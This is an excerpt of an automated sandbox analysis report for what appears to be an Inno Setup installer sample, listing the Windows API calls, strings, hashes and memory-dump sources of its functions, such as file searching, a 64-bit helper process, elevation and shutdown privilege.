                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                                                • Instruction ID: 3702fe8876d82bde104835ae14f19b545f9b4323f369928b31ff8c7c86e788f0
                                                                                • Opcode Fuzzy Hash: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                                                • Instruction Fuzzy Hash: 32014C356043086A8B10CF69AC004AEFBE8DB4D7217108277FC14D3382DA744E0496E4
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                                                • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                • Opcode Fuzzy Hash: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                • API String ID: 2323315520-3614243559
                                                                                • Opcode ID: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                                                • Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
                                                                                • Opcode Fuzzy Hash: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                                                • Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00458993
                                                                                • QueryPerformanceCounter.KERNEL32(02153858,00000000,00458C26,?,?,02153858,00000000,?,00459322,?,02153858,00000000), ref: 0045899C
                                                                                • GetSystemTimeAsFileTime.KERNEL32(02153858,02153858), ref: 004589A6
                                                                                • GetCurrentProcessId.KERNEL32(?,02153858,00000000,00458C26,?,?,02153858,00000000,?,00459322,?,02153858,00000000), ref: 004589AF
                                                                                • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
                                                                                • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02153858,02153858), ref: 00458A33
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
                                                                                • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
                                                                                  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
                                                                                • CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                • API String ID: 770386003-3271284199
                                                                                • Opcode ID: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                                                • Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
                                                                                • Opcode Fuzzy Hash: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                                                • Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                                                APIs
                                                                                  • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                  • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                  • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                  • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0), ref: 004782E8
                                                                                  • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                  • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02152BE0,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                                                • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                                                • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                                                • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                • API String ID: 883996979-221126205
                                                                                • Opcode ID: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                                • Instruction ID: be90243bdd9c3757315ff9bbcfcad83cd6a8df60a98d136a70e83fac94f3d3e4
                                                                                • Opcode Fuzzy Hash: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                                • Instruction Fuzzy Hash: E0314670A40609BEDB11EFAAD845ADEB6B8EF05314F50847FF518E7281DB7C89058B19
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                Similarity
                                                                                • API ID: MessageSendShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1631623395-0
                                                                                • Opcode ID: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                                • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                                                • Opcode Fuzzy Hash: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                                • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 004183A3
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                • GetWindowRect.USER32(?), ref: 004183DC
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                • String ID: ,
                                                                                • API String ID: 2266315723-3772416878
                                                                                • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                                                • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 107509674-3733053543
                                                                                • Opcode ID: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                                • Instruction ID: f0f78ca649e8ddc1473c2e21848b41e7847a09c75f53dffa28e6f5675cd8c776
                                                                                • Opcode Fuzzy Hash: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                                • Instruction Fuzzy Hash: 32F0F670284B42B9E610AA758C13F3B21C89B40B49F80083EBD09EA1C3D7BDC80C4A2F
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D4F5
                                                                                • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D505
                                                                                • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D515
                                                                                • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F47B,00000000,0047F4A4), ref: 0045D53A
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressProc$CryptVersion
                                                                                • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                • API String ID: 1951258720-508647305
                                                                                • Opcode ID: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                                • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                                                • Opcode Fuzzy Hash: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                                • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                                                • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstNext
                                                                                • String ID: isRS-$isRS-???.tmp
                                                                                • API String ID: 134685335-3422211394
                                                                                • Opcode ID: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                                • Instruction ID: b2847bb1a44685988a55541ee7ac685ebeb66ffb5e30493f66813578f7a68db2
                                                                                • Opcode Fuzzy Hash: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                                • Instruction Fuzzy Hash: A63165719146186FCF10EF65CC41ADEBBBCDB45318F5084F7A808A32A1E638AE458F58
                                                                                APIs
                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                                                • SetForegroundWindow.USER32(?), ref: 00457481
                                                                                • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                                                Strings
                                                                                • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                                                Similarity
                                                                                • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                • API String ID: 2236967946-3182603685
                                                                                • Opcode ID: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                                • Instruction ID: 5bc10c0d354cae83c82450a0913647aad13fd3ad71d4eb48676ad76960377df7
                                                                                • Opcode Fuzzy Hash: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                                • Instruction Fuzzy Hash: D9910034608204EFD715CF54E991F5ABBF9EB89305F2180BAED0897792D638AE04DF58
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                • API String ID: 1646373207-3712701948
                                                                                • Opcode ID: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                                • Instruction ID: 12dfdd1b414f9b5fa57bb507e68127e36b1c1a940f154b23c6ee37fdedd7ee09
                                                                                • Opcode Fuzzy Hash: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                                • Instruction Fuzzy Hash: 66415171A04649AFCF01EFA5C8929EFB7B8EF49304F508566F800F7252D6785E09CB69
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 00417D1F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID: ,
                                                                                • API String ID: 568898626-3772416878
                                                                                • Opcode ID: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                • Opcode Fuzzy Hash: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
APIs
• SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
• FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
• FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
• FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
• Instruction ID: 2652c2d8e8669354d55d474f1d59e7b06630ff05c6329d0403030a32038cf055
• Opcode Fuzzy Hash: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
• Instruction Fuzzy Hash: 1E418770A00618AFCF10EF65DC55ADEB7B8EB89705F5044BAF804E7381E67C9E848E59
APIs
• SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
• FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
• FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
• FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
• Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
• Opcode Fuzzy Hash: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
• Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: ErrorLast$CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 1177325624-0
• Opcode ID: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
• Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
• Opcode Fuzzy Hash: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
• Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
APIs
• IsIconic.USER32(?), ref: 004833FA
• GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
• ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
• ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Window$Show$IconicLong
• String ID:
• API String ID: 2754861897-0
• Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
• Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
• Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
• Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
